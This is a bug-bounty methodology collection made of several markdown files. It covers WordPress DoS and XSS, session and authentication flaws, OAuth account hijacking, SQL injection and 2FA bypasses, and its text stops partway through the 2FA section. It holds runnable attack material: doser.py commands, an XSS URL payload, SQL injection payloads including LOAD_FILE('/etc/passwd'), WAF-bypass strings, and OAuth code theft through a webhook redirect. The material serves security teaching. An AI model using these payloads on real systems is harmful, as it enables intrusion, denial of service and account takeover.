PORT scan only) 52 | ``` 53 | 54 | pingback.ping 55 | 56 | http://: 57 | http:// 58 | 59 | 60 | ``` 61 | ### Tool To Automate XMLRPC-Scan. 62 | 63 | [XMLRPC-Scan](https://github.com/nullfil3/xmlrpc-scan) 64 | 65 | ### References 66 | [Bug Bounty Cheat Sheet](https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html) 67 | 68 | [Medium Writeup](https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32) 69 | 70 | [WpEngine Blog Post](https://wpengine.com/resources/xmlrpc-php/) 71 | 72 | # Directory listing 73 | Sometimes developers forget to disable the directory listing on /wp-content/uploads. So this is the common issue on wordpress sites. 74 | 75 | ### Detection 76 | /wp-content/uploads 77 | 78 | ### Pro tip 79 | Add this path to your fuzzing wordlist 80 | 81 | ### References 82 | [H1 Report](https://hackerone.com/reports/201984) 83 | [H1 Report](https://hackerone.com/reports/762118) 84 | [H1 Report](https://hackerone.com/reports/789388) 85 | [H1 Report](https://hackerone.com/reports/448985) 86 | 87 | # CVE-2018-6389 88 | This issue can down any Wordpress site under 4.9.3 So while reporting make sure that your target website is running wordpress under 4.9.3 89 | 90 | ### Detection 91 | Use the URL from my gist called loadsxploit, you will get a massive js data in response. 92 | 93 | [loadsxploit](https://gist.github.com/remonsec/4877e9ee2b045aae96be7e2653c41df9) 94 | 95 | ### Exploit 96 | You can use any Dos tool i found Doser really fast and it shut down the webserver within 30 second 97 | 98 | [Doser](https://github.com/quitten/doser.py) 99 | ``` 100 | python3 doser.py -t 999 -g 'https://site.com/fullUrlFromLoadsxploit' 101 | ``` 102 | ### References 103 | [H1 Report](https://hackerone.com/reports/752010) 104 | 105 | [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389) 106 | 107 | [Blog Post](https://baraktawily.blogspot.com/2018/02/how-to-dos-29-of-world-wide-websites.html) 108 | 109 | # CVE-2021-24364 110 | The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. 111 | 112 | ### Detection and Exploit 113 | * Replace to your WP-site 114 | /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D 115 | * Wait for the pop-up! 116 | 117 | ### Reference 118 | [NVD](https://nvd.nist.gov/vuln/detail/CVE-2021-24364) 119 | 120 | # WP Cornjob DOS 121 | This is another area where you can perform a DOS attack. 122 | 123 | ### Detection 124 | * visit site.com/wp-cron.php 125 | * You will see a Blank page with 200 HTTP status code 126 | 127 | ### Exploit 128 | You can use the same tool Doser for exploiting this 129 | ``` 130 | python3 doser.py -t 999 -g 'https://site.com/wp-cron.php' 131 | ``` 132 | ### Reference 133 | 134 | [GitHub Issue](https://github.com/wpscanteam/wpscan/issues/1299) 135 | 136 | [Medium Writeup](https://medium.com/@thecpanelguy/the-nightmare-that-is-wpcron-php-ae31c1d3ae30) 137 | 138 | # WP User Enumeration 139 | This issue will only acceptable when target website is hiding their current users or they are not publically available. So attacker can use those user data for bruteforcing and other staff 140 | 141 | ### Detection 142 | * visit site.com/wp-json/wp/v2/users/ 143 | * You will see json data with user info in response 144 | 145 | ### Exploit 146 | If you have xmlrpc.php and this User enumeration both presence there. Then you can chain them out by collecting username from wp-json and perform Bruteforce on them via xmlrpc.php. It will surely show some extra effort and increase the impact as well 147 | 148 | ### Reference 149 | [H1 Report](https://hackerone.com/reports/356047) 150 | 151 | # Researcher Note 152 | Please do not depend on those issues at all. I saw people only looking for those issues and nothing else. Those are good to have a look while testing for other vulnerabilities and most of the time they work good for chaining with other low bugs. 153 | 154 | # Author 155 | **Name:** Mehedi Hasan Remon 156 | 157 | **Handle:** [@remonsec](https://twitter.com/remonsec) 158 | -------------------------------------------------------------------------------- /Broken_Auth_And_Session_Management/Session_based_bugs.md: -------------------------------------------------------------------------------- 1 | # Broken Authentication And Session Management. 2 | 3 | ### Old Session Does Not Expire After Password Change: 4 | * Steps: 5 | ``` 6 | 1.create An account On Your Target Site 7 | 2.Login Into Two Browser With Same Account(Chrome, FireFox.You Can Use Incognito Mode As well) 8 | 3.Change You Password In Chrome, On Seccessfull Password Change Referesh Your Logged in Account In FireFox/Incognito Mode. 9 | 4.If you'r still logged in Then This Is a Bug 10 | ``` 11 | 12 | ### Session Hijacking (Intended Behavior) 13 | * Steps: 14 | ``` 15 | 1.Create your account 16 | 2.Login your account 17 | 3.Use cookie editor extension in browser 18 | 4.Copy all the target cookies 19 | 5.Logout your account 20 | 6.Paste that cookies in cookie editor extension 21 | 7.Refresh page if you are logged in than this is a session hijacking 22 | ``` 23 | `Impact:` If attacker get cookies of victim it will leads to account takeover. 24 | 25 | 26 | ### Password reset token does not expire (Insecure Configurability) 27 | * Steps: 28 | ``` 29 | 1.Create your account on target Site. 30 | 2.request for a forget password token. 31 | 3.Don't use that link 32 | 4.Instead logged in with your old password and change your email to other. 33 | 5.Now use that password link sents to old email and check if you are able to change your password if yes than there is the litle bug. 34 | ``` 35 | 36 | ### Server security misconfiguration -> Lack of security headers -> Cache control for a security page 37 | * Steps : 38 | ``` 39 | 1. Login to the application 40 | 2. Navigate around the pages 41 | 3. Logout 42 | 4. Press (Alt+left-arrow) buttons 43 | 5. If you are logged in or can view the pages navigated by the user. Then you found a bug. 44 | ``` 45 | `Impact:` At a PC cafe, if a person was in a very important page with alot of details and logged out, then another person comes and clicks back (because he didnt close the browser) then data is exposed. User information leaked 46 | 47 | ### Broken Authentication To Email Verification Bypass (P4) : 48 | `category` : P4 >> Broken Authentication and Session Management >> Failure to Invalidate Session >> On Password Reset and/or Change 49 | 50 | * Steps To Reproduce: 51 | ``` 52 | 1)First You need to make a account & You will receive a Email verification link. 53 | 2)Application in my case give less Privileges & Features to access if not verified. 54 | 3)Logged into the Application & I change the email Address to Email B. 55 | 4)A Verification Link was Send & I verified that. 56 | 5) Now I again Changed the email back to Email I have entered at the time of account creation. 57 | 6) It showed me that my Email is Verified. 58 | 7) Hence , A Succesful Email verfication Bypassed as I haven't Verified the Link which was sent to me in the time of account creation still my email got verified. 59 | 8)Didn't Receive any code again for verification when I changed back my email & When I open the account it showed in my Profile that its Verified Email. 60 | ``` 61 | 62 | `Impact` : 63 | Email Verfication was bypassed due to Broken Authentication Mechanism , Thus more Privileged account can be accessed by an attacker making website prone to Future Attacks. 64 | Happy Hacking:) 65 | 66 | ### Email Verification Bypass (P3/P4) 67 | * Steps : 68 | ``` 69 | 1)First You need to Create an account with Your Own Email Address. 70 | 2)After Creating An Account A Verification Link will be sent to your account. 71 | 3)Dont Use The Email Verification link. Change Your Email to Victim's Email. 72 | 4)Now Go in Your Email and Click on Your Own Email Verification Link. 73 | 5)if the Victim's Email Get Verified then This is a Bug. 74 | ``` 75 | `Impact` : Email Verfication Bypass 76 | 77 | ### Old Password Reset Token Not Expiring Upon Requesting New One (Sometimes P4) : 78 | * Steps : 79 | ``` 80 | 1)First You need to Create an account with a Valid Email Address. 81 | 2)After Creating An Account log out from your Account and Navigate on Forgot Password Page. 82 | 3)Request a Password Reset Link for your Account.A Verification Link will be sent to your account. 83 | 4)Without Using this Password Reset Link Request A New Password Reset Link. 84 | 5)Now go in Your email and Use 1st Password Reset Link Rather than Using 2nd One And Change Your Password. 85 | 6) If You Are Able to Change Your Password Than This Is a tiny Bug ;). 86 | ``` 87 | * Note:- Some Companies Won't Accept it As Valid Issue. 88 | 89 | ### Password Reset Token Not Expiring After Password Change (P4): 90 | * Steps : 91 | ``` 92 | 1)First You need to Create an account with a Valid Email Address. 93 | 2)After Creating An Account log out from your Account and Navigate on Forgot Password Page. 94 | 3)Request a Password Reset Link for your Account. 95 | 4)Use The Password Reset Link And Change The Password, After Changing the Password Login to Your Account. 96 | 5)Now Use The Old Password Reset Link To Change The Password Again. 97 | 6) If You Are Able to Change Your Password Again Than This Is a tiny Bug ;). 98 | ``` 99 | 100 | ### Insufficient account process validation leads to account takeover (P3/P4): 101 | * Steps : 102 | ``` 103 | 1) Create an account on the website. 104 | 2) Go to profile section. And Change & update your details in the name parameter and before saving it Open Burp suite, turn the proxy on and then click on Save. 105 | 3) Now capture the request in Burp suite and send it to the Repeater tab. 106 | 4) Now log out from the website and go back to the Burp suite. 107 | 5) Now change the details email & name parameters and click on "Go" in the repeater tab. 108 | 6) Now you will be able to see 200 ok response from the web server. 109 | 7) Now, login into your account and go to the Profile section to confirm 110 | ``` 111 | 112 | * Thanks For Reading Guys Happy Hunting :). 113 | 114 | ## Resources: 115 | Google,Youtube. 116 | 117 | ## Authors 118 | * [https://twitter.com/Virdoex_hunter](https://twitter.com/Virdoex_hunter) 119 | * Linkedin : [@chirag_Agrawal](https://www.linkedin.com/in/chirag-agrawal-770488144/), Twitter : [@Raiders](https://twitter.com/ChiragA15977205) 120 | * Twitter : [Fani Malik](https://twitter.com/fanimalikhack) 121 | * Linkedin : [@suprit-pandurangi](https://www.linkedin.com/in/suprit-pandurangi-a90526106/) 122 | -------------------------------------------------------------------------------- /OAuth/OAuth 2.0 Hunting Methodology.md: -------------------------------------------------------------------------------- 1 | ## OAuth 2.0 Hunting Methodology 2 | In OAuth there are 2 types of flows/grant types: 3 | - Authorization code flow 4 | - Implicit flow 5 | 6 | Note: *if the oauth service uses authorization code flow then there is little to no chance of finding a bug but if the oauth service uses implicit flow then there is a good chance of finding bugs* 7 | 8 | ## How to differentiate between implicit and authorization code grant type 9 | 10 | ### Authorization code grant type 11 | 12 | **Authorization request** 13 | - When you send an authorization request to the oauth service in the client application , The client application sends a request to the OAuth service's `/authorization` endpoint asking for permission to access specific user data. 14 | 15 | > Note: the endpoint name can be different according to the application like `/auth` etc. but you can identify them based on the parameters used. 16 | 17 | - The request in authorization code flow looks like: 18 | 19 | ``` 20 | GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1 21 | Host: oauth-authorization-server.com 22 | ``` 23 | 24 | - So, in authorization code grant type the `response_type` parameter should be `code` . this code is used to request access token from the oauth service. 25 | 26 | - Now, after the user login to their account with the OAuth provider and gives consent to access their data. the user will be redirected to the `/callback` endpoint that was specified in the `redirect_uri` parameter of the authorization request. The resulting `GET` request will contain the authorization code as a query parameter. 27 | 28 | **Authorization code grant** 29 | 30 | ``` 31 | GET /callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24 HTTP/1.1 32 | Host: client-app.com 33 | ``` 34 | 35 | - Rest of the stuff like access token grant and API calls are done in the back-end so you cannot see them in your proxy. 36 | 37 | ```md 38 | **factors that determine authorization code flow:** 39 | - Initial authorization request has `response_type=code` 40 | - the `/callback` request contains authorization code as a parameter. 41 | ``` 42 | 43 | ### Implicit grant type 44 | 45 | **Authorization request** 46 | - The implicit flow starts in pretty much the same way as the authorization code flow. The only major difference is that the `response_type` parameter must be set to `token`. 47 | 48 | ``` 49 | GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=token&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1 50 | Host: oauth-authorization-server.com 51 | ``` 52 | 53 | **Access Token grant** 54 | 55 | - If the user logs in and gives their consent to the request access , the oauth service redirects the user to the `/callback` endpoint but instead of sending a parameter containing an authorization code, it will send the access token and other token-specific data as a URL fragment. 56 | 57 | ``` 58 | GET /callback#access_token=z0y9x8w7v6u5&token_type=Bearer&expires_in=5000&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1 59 | Host: client-app.com 60 | ``` 61 | 62 | 63 | ```md 64 | **factors that determine Implicit flow:** 65 | - Initial authorization request has `response_type=token` 66 | - the `/callback` request contains access token as a parameter. 67 | ``` 68 | 69 | --- 70 | 71 | *Now that you have determined which grant type the OAuth service uses , you can proceed to find bugs.* 72 | 73 | ### Method-1 (Auth bypass in OAuth implicit flow) 74 | - To log the user in every time with oauth , the client application sends a POST request to the server containing user info (email-id, username) and access token to generate a session cookie. 75 | - so, find a POST req in http history which contains user-info and access token. 76 | - Usually in implicit flow , the server doesn't validate the access token so you can change the parameters like email-id and/or username to impersonate another user and bypass authentication. 77 | 78 | ### Method-2 (Forced profile linking) 79 | - This is similar to a traditional CSRF attack so the impact may not be that much. 80 | - In this when you sign in with social media profile, you will be redirected to the social media website and then you log in with social media credentials. 81 | - Now the next time when you log in , you will be logged in instantly. capture this request with burp. 82 | - In the http history there would be a request similar to `/auth?client_id[...]` . In that request the redirect_uri sends the authorization code to something like `/oauth-linking`. Check if the `state` parameter is present. if its not present then it is vulnerable to CSRF attacks. because that means there is no way for server to verify if this information is from the same user. 83 | - So absence of `state` parameter in this request is itself a vulnerability. 84 | - Past this you can try sending the exploit link to the victim and complete the oauth flow by attaching your social media profile to their account. 85 | - For this copy URL of the request in burp and drop the request so that the code isn't used. 86 | - Turn off intercept and log out of website. 87 | - Now you can send this link to the victim or you can set it as an iframe on your website ``. and deliver your website link to the victim. 88 | - When their browser loads the `iframe`, it will complete the OAuth flow using your social media profile, attaching it to the victim account. 89 | 90 | ### Method-3 (Account hijacking via redirect_uri) 91 | - Complete the oauth sign in flow and log out then log back in and you will be logged in instantly this time. 92 | - Find the most recent Authorization request in http history, it should be similar to `GET /auth?client_id=[...]`. 93 | - Check the redirect_uri param and try to change it. If you can redirect it to an external site then good , if not then try different endpoints on the same website and check if they work. 94 | - if there is an open redirect then change the redirect_uri to your webhook site link and follow the redirect. 95 | - Now check for a log entry in webhook.site containing an authorization code. 96 | - So now you can send the request url to the victim (or make an iframe as mentioned above) with redirect_uri set as your webhook site and leak their authorization codes. 97 | - If the victim clicks on the link then you would see the authorization code in your webhook.site logs. 98 | - now you can use this stolen code in the callback request and the rest of the OAuth flow will be completed automatically and you will be logged in as the admin user. 99 | 100 | ## Author: 101 | [Pyr0sec](https://twitter.com/Pyr0sec) 102 | -------------------------------------------------------------------------------- /SQLi/SQL_Injection.md: -------------------------------------------------------------------------------- 1 | # SQL Injection 2 | Here are some quick methods to detect the SQL Injection vulnerability, though the methods are not limited. There are various tricks and tools. 3 | 4 | # Methods To Find Sqli 5 | 6 | ## 1. Using Burpsuite : 7 | ``` 8 | 1. Capture the request using burpsuite. 9 | 2. Send the request to burp scanner. 10 | 3. Proceed with active scan. 11 | 4. Once the scan is finished, look for SQL vulnerability that has been detected. 12 | 5. Manually try SQL injection payloads. 13 | 6. Use SQLMAP to speed up the process. 14 | ``` 15 | ## 2. Using waybackurls and other bunch of tools : 16 | ``` 17 | 1. sublist3r -d target | tee -a domains (you can use other tools like findomain, assetfinder, etc.) 18 | 2. cat domains | httpx | tee -a alive 19 | 3. cat alive | waybackurls | tee -a urls 20 | 4. gf sqli urls >> sqli 21 | 5. sqlmap -m sqli --dbs --batch 22 | 6. use tamper scripts 23 | ``` 24 | * More Details in this source thread [https://twitter.com/El3ctr0Byt3s/status/1302706241240731649](https://twitter.com/El3ctr0Byt3s/status/1302706241240731649) 25 | 26 | ## 3. Using heuristic scan to get hidden parameters : 27 | ``` 28 | 1. Use subdomain enumeration tools on the domain. 29 | 2. Gather all urls using hakcrawler, waybackurls, gau for the domain and subdomains. 30 | 3. You can use the same method described above in 2nd point. 31 | 4. Use Arjun to scan for the hidden params in the urls. 32 | 5. Use --urls flag to include all urls. 33 | 6. Check the params as https://domain.com?= 34 | 7. Send request to file and process it through sqlmap. 35 | ``` 36 | ## 4. Error generation with untrusted input or special characters : 37 | ``` 38 | 1. Submit single quote character ' & look for errors. 39 | 2. Submit SQL specific query. 40 | 3. Submit Boolean conditions such as or 1=1 and or 1=0, and looking application's response. 41 | 4. Submit certain payloads that results in time delay. 42 | ``` 43 | # Post-Methods 44 | ## 1. Finding total number of columns with order by or group by or having : 45 | ``` 46 | Submit a series of ORDER BY clause such as 47 | 48 | ' ORDER BY 1 -- 49 | ' ORDER BY 2 -- 50 | ' ORDER BY 3 -- 51 | 52 | and incrementing specified column index until an error occurs. 53 | ``` 54 | ## 2. Finding vulnerable columns with union operator : 55 | ``` 56 | Submit a series of UNION SELECT payloads. 57 | 58 | ' UNION SELECT NULL -- 59 | ' UNION SELECT NULL, NULL -- 60 | ' UNION SELECT NULL, NULL, NULL -- 61 | 62 | (Using NULL maximizes the probability that the payload will succeed. NULL can be converted to every commonly used data type.) 63 | ``` 64 | * To go for the methods in more detail, go through portswigger site. 65 | 66 | https://portswigger.net/web-security/sql-injection/union-attacks 67 | 68 | ## 3. Extracting basic information like database(), version(), user(), UUID() with concat() or group_concat() 69 | 70 | ### 1. Database version 71 | ``` 72 | Oracle SELECT banner FROM v$version 73 | SELECT version FROM v$instance 74 | 75 | Microsoft SELECT @@version 76 | 77 | PostgreSQL SELECT version() 78 | 79 | MySQL SELECT @@version 80 | ``` 81 | ### 2. Database contents 82 | ``` 83 | Oracle SELECT * FROM all_tables 84 | SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' 85 | 86 | Microsoft SELECT * FROM information_schema.tables 87 | SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' 88 | 89 | PostgreSQL SELECT * FROM information_schema.tables 90 | SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' 91 | 92 | MySQL SELECT * FROM information_schema.tables 93 | SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' 94 | ``` 95 | ### 3. Shows version, user and database name 96 | ``` 97 | ' AND 1=2 UNION ALL SELECT concat_ws(0x3a,version(),user(),database()) 98 | ``` 99 | ### 4. Using group_concat() function, used to concat all the rows of the returned results. 100 | ``` 101 | ' union all select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()– 102 | ``` 103 | ## 4. Accessing system files with load_file(). and advance exploitation afterwards : 104 | ``` 105 | ' UNION ALL SELECT LOAD_FILE ('/ etc / passwd') 106 | ``` 107 | ## 5. Bypassing WAF : 108 | 109 | ### 1. Using Null byte before SQL query. 110 | ``` 111 | %00' UNION SELECT password FROM Users WHERE username-'xyz'-- 112 | ``` 113 | ### 2. Using SQL inline comment sequence. 114 | ``` 115 | '/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/username/**/LIKE/**/'xyz'-- 116 | ``` 117 | ### 3. URL encoding 118 | ``` 119 | for example : 120 | / URL encoded to %2f 121 | * URL encoded to %2a 122 | 123 | Can also use double encoding, if single encoding doesn't works. Use hex encoding if the rest doesn't work. 124 | ``` 125 | ### 4. Changing Cases (uppercase/lowercase) 126 | * For more step wise detailed methods, go through the link below. 127 | 128 | https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF 129 | ### 5. Use SQLMAP tamper scripts. It helps bypass WAF/IDS/IPS. 130 | * 1. Use Atlas. It helps suggesting tamper scripts for SQLMAP. 131 | 132 | https://github.com/m4ll0k/Atlas 133 | * 2. JHaddix post on SQLMAP tamper scripts. 134 | 135 | https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423 136 | 137 | ## 6. Time Delays : 138 | ``` 139 | Oracle dbms_pipe.receive_message(('a'),10) 140 | 141 | Microsoft WAITFOR DELAY '0:0:10' 142 | 143 | PostgreSQL SELECT pg_sleep(10) 144 | 145 | MySQL SELECT sleep(10) 146 | ``` 147 | ## 7. Conditional Delays : 148 | ``` 149 | Oracle SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual 150 | 151 | Microsoft IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10' 152 | 153 | PostgreSQL SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END 154 | 155 | MySQL SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a') 156 | ``` 157 | # Resources and tools that will help gain an upper hand on finding bugs : 158 | * Portswigger SQL Injection cheat sheet - https://portswigger.net/web-security/sql-injection/cheat-sheet 159 | * HTTPX - https://github.com/encode/httpx 160 | * GF patterns - https://github.com/1ndianl33t/Gf-Patterns 161 | * GF (Tomnomnom)- https://github.com/tomnomnom/gf 162 | * We can also use gau with waybackurls to fetch all urls. 163 | * Waybackurls - https://github.com/tomnomnom/waybackurls 164 | * Gau - https://github.com/lc/gau 165 | * Arjun - https://github.com/s0md3v/Arjun 166 | * Hakcrawler - https://github.com/hakluke/hakrawler 167 | 168 | 169 | ### Author : 170 | 171 | * [@xhan1x](https://twitter.com/xhan1x) 172 | -------------------------------------------------------------------------------- /Authentication_Bypass/2FA_Bypasses.md: -------------------------------------------------------------------------------- 1 | # **2FA Bypass Techniques** 2 | 3 | ## **Introduction** 4 | Two-Factor Authentication (2FA) is a security mechanism designed to add an extra layer of protection by requiring users to provide an additional verification code after entering their credentials. However, improper implementations of 2FA can introduce various security flaws that allow attackers to bypass authentication. 5 | 6 | This document outlines **common 2FA bypass techniques**, including **response manipulation, brute-force attacks, backup code abuse, and session hijacking**. Each method is detailed with examples and exploitation steps. 7 | 8 | For a **visual reference**, a **[2FA Bypass Mindmap](https://mm.tt/1736437018?t=SEeZOmvt01)** provides an overview of different attack vectors. 9 | 10 | --- 11 | 12 | ## **Common 2FA Bypass Techniques** 13 | 14 | ### **Index of Techniques** 15 | | # | **Technique** | 16 | |----|--------------| 17 | | **1** | Response Manipulation | 18 | | **2** | Status Code Manipulation | 19 | | **3** | 2FA Code Leakage in Response | 20 | | **4** | JavaScript File Analysis | 21 | | **5** | 2FA Code Reusability | 22 | | **6** | Lack of Brute-Force Protection | 23 | | **7** | Missing 2FA Code Integrity Validation | 24 | | **8** | CSRF on 2FA Disabling | 25 | | **9** | Password Reset Disables 2FA | 26 | | **10** | Backup Code Abuse | 27 | | **11** | Clickjacking on 2FA Disabling Page | 28 | | **12** | Enabling 2FA Without Expiring Active Sessions | 29 | | **13** | Bypass 2FA with `null` or `000000` | 30 | 31 | --- 32 | 33 | ## **1. Response Manipulation** 34 | Some 2FA implementations return a JSON response indicating whether authentication was successful. **Altering the response** can bypass restrictions. 35 | 36 | ### **Exploitation** 37 | - Intercept the response using **Burp Suite** or **a browser's developer tools**. 38 | - Look for a response like: 39 | ```json 40 | { "success": false } 41 | ``` 42 | - Change it to: 43 | ```json 44 | { "success": true } 45 | ``` 46 | - If client-side validation is weak, access is granted. 47 | 48 | --- 49 | 50 | ## **2. Status Code Manipulation** 51 | Some applications rely on HTTP status codes to determine authentication success. 52 | 53 | ### **Exploitation** 54 | - If a **4xx error** (e.g., `401 Unauthorized`) is received after entering a **wrong** 2FA code, modify the response to: 55 | ``` 56 | HTTP/1.1 200 OK 57 | ``` 58 | - Some applications may grant access **even if authentication failed**. 59 | 60 | --- 61 | 62 | ## **3. 2FA Code Leakage in API Responses** 63 | Some applications accidentally **leak the 2FA code** in their API response. 64 | 65 | ### **Exploitation** 66 | - Intercept the **request triggering the 2FA code**. 67 | - Examine the API response. 68 | - If the response contains: 69 | ```json 70 | { "otp": "123456" } 71 | ``` 72 | - The attacker can directly **use the leaked OTP**. 73 | 74 | --- 75 | 76 | ## **4. JavaScript File Analysis** 77 | Some applications store **2FA-related logic** in JavaScript files. 78 | 79 | ### **Exploitation** 80 | - Check for exposed `.js` files in the application. 81 | - Look for sensitive **hardcoded values** like: 82 | ```javascript 83 | var otp = "123456"; 84 | ``` 85 | - Attackers can **extract OTP verification logic** or **static OTPs**. 86 | 87 | --- 88 | 89 | ## **5. 2FA Code Reusability** 90 | Some applications **do not expire OTPs after use**, allowing attackers to **reuse** them. 91 | 92 | ### **Exploitation** 93 | - Obtain a **valid OTP** from a previous session. 94 | - Attempt to reuse the same OTP for authentication. 95 | - If the system does not enforce **one-time use**, the **old OTP grants access**. 96 | 97 | --- 98 | 99 | ## **6. Lack of Brute-Force Protection** 100 | Applications that **do not limit OTP attempts** allow brute-forcing. 101 | 102 | ### **Exploitation** 103 | - Identify the **number of OTP digits** (commonly `4`-`6`). 104 | - Use a tool like `Burp Intruder` to brute-force: 105 | ``` 106 | 000000 - 999999 107 | ``` 108 | - **Weak OTP validation** allows attackers to guess the correct OTP. 109 | 110 | --- 111 | 112 | ## **7. Missing 2FA Code Integrity Validation** 113 | Some systems accept **any valid OTP**, even from different accounts. 114 | 115 | ### **Exploitation** 116 | - Obtain a **valid OTP** for **Account A**. 117 | - Use the **same OTP** to authenticate **Account B**. 118 | - If the system **does not verify OTP ownership**, access is granted. 119 | 120 | --- 121 | 122 | ## **8. CSRF on 2FA Disabling** 123 | Some applications **lack CSRF protection** when disabling 2FA. 124 | 125 | ### **Exploitation** 126 | - Construct a **malicious request** to disable 2FA: 127 | ```html 128 |
129 | 130 | 131 |
132 | ``` 133 | - Trick the victim into **clicking the form**, disabling their 2FA. 134 | 135 | --- 136 | 137 | ## **9. Password Reset Disables 2FA** 138 | Some systems **disable 2FA** when a user resets their password. 139 | 140 | ### **Exploitation** 141 | - If an account has 2FA enabled, attempt a **password reset**. 142 | - Check if **2FA is still active** after resetting the password. 143 | - If **2FA is disabled**, log in **without 2FA authentication**. 144 | 145 | --- 146 | 147 | ## **10. Backup Code Abuse** 148 | Backup codes provide **alternative login options** when OTP is unavailable. 149 | 150 | ### **Exploitation** 151 | - If backup codes are stored **insecurely**, they can be leaked or stolen. 152 | - Some applications **do not expire backup codes after use**, allowing repeated exploitation. 153 | 154 | --- 155 | 156 | ## **11. Clickjacking on 2FA Disabling Page** 157 | Some applications allow **2FA to be disabled** without additional verification. 158 | 159 | ### **Exploitation** 160 | - Load the **2FA disabling page** in an `